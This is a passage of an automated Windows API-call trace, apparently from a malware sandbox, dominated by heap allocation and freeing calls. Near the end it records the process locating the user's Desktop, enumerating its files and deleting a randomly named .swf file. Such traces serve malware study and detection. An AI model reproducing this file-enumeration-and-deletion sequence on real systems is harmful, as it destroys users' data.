lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0211.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0211.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0211.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0211.070] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0211.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0211.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0211.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0211.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0211.070] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0211.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0211.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0211.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0211.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0211.070] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0211.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0211.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0211.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0211.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0211.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0211.070] FreeLibrary (hLibModule=0x756e0000) returned 1 [0211.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0211.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0211.070] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0211.070] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0211.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0211.071] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0211.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0211.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0211.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0211.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0211.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0211.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0211.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0211.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0211.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0211.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0211.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0211.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0211.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0211.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0211.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0211.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0211.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0211.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0211.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0211.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0211.071] CloseHandle (hObject=0x2d0) returned 1 [0211.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0211.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0211.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0211.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0211.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0211.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0211.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0211.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0211.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0211.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0211.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0211.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0211.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0211.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0211.073] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0211.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0211.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0211.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0211.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0211.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0211.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0211.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0211.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0211.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0211.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0211.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0211.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0211.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0211.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0211.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0211.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0211.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0211.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0211.074] CloseHandle (hObject=0x2a0) returned 1 [0211.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0211.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0211.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0211.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0211.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0211.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0211.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0211.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0211.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0211.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0211.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0211.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0211.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0211.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0211.161] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0211.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0211.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0211.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0211.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0211.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0211.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0211.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0211.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0211.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0211.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0211.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0211.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0211.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0211.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0211.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0211.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0211.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0211.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0211.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0211.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0211.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0211.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0211.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0211.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0211.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0211.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0211.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0211.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0211.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0211.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0211.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0211.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0211.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0211.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0211.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0211.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0211.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0211.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0211.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0211.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0211.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0211.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0211.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0211.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0211.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0211.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0211.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0211.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0211.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0211.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0211.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0211.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0211.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0211.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0211.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0211.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0211.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0211.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0211.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0211.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0211.277] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0211.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0211.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0211.287] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0211.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0211.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0211.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0211.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0211.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0211.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0211.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0211.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0211.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0211.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0211.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0211.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0211.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0211.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0211.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0211.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0211.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5e) returned 0x2e563a8 [0211.288] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/wg77xQT1-Aj18nXa8K.swf", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\wg77xQT1-Aj18nXa8K.swf", lpFilePart=0x8cedf4*="wg77xQT1-Aj18nXa8K.swf") returned 0x2e [0211.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0211.288] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\wg77xQT1-Aj18nXa8K.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\wg77xqt1-aj18nxa8k.swf")) returned 0x20 [0211.290] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\wg77xQT1-Aj18nXa8K.swf", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x736f10c0, ftCreationTime.dwHighDateTime=0x1d5ec38, ftLastAccessTime.dwLowDateTime=0x1b53ae80, ftLastAccessTime.dwHighDateTime=0x1d5e1ef, ftLastWriteTime.dwLowDateTime=0x1b53ae80, ftLastWriteTime.dwHighDateTime=0x1d5e1ef, nFileSizeHigh=0x0, nFileSizeLow=0x96cc, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="wg77xQT1-Aj18nXa8K.swf", cAlternateFileName="WG77XQ~1.SWF")) returned 0xa87390 [0211.291] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\wg77xQT1-Aj18nXa8K.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\wg77xqt1-aj18nxa8k.swf")) returned 1 [0211.295] FindNextFileW (in: hFindFile=0xa87390, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x736f10c0, ftCreationTime.dwHighDateTime=0x1d5ec38, 